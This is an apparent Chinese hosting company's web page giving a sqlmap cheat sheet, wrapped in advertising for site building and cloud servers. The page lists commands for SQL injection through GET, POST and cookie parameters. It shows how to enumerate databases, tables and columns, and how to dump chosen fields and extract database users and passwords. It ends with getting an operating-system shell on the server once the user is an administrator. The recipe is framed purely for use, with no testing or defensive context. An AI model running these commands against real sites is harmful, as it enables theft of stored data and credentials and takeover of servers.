SQLMAP

成都创新互联公司长期为上千客户提供的网站建设服务，团队从业经验10年，关注不同地域、不同群体，并针对不同对象提供差异化的产品和服务；打造开放共赢平台，与合作伙伴共同营造健康的互联网生态环境。为松阳企业提供专业的成都网站设计、网站制作，松阳网站改版等技术服务。拥有十多年丰富建站经验和众多成功案例,为您定制开发。

GET  方式的注入  sqlmap.py -u "URL"

POST  方式的注入  sqlmap.py -u "URL" --data "POST参数=POST数值"

COOKIE 方式的注入  sqlmap.py -u "URL" --cookie "cookies 值"

爆数据库名(cookie根据实际的情况)  sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs

爆目标数据库中的表   sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables

爆目标数据表字段  sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns

导出目标字段的数据 sqlmap.py  -u "URL"  [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump

爆出目标库有多少数据   sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count

检测当前用户     sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user

检测当前用户是否管理员  sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba

检测数据库用户    sqlmap.py -u "URL" [--cookie "cookies 值"]  --user -v 0

检测数据库用户密码   sqlmap.py -u "URL" [--cookie "cookies 值"]  --password -v 0

检测当前数据库    sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db

多线程       -threading 5

如果是管理员,我们可以写Shell

操作系统Shell写入

sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

网页名称：sqlmap命令-创新互联
浏览路径：http://cdweb.net/article/dcdepi.html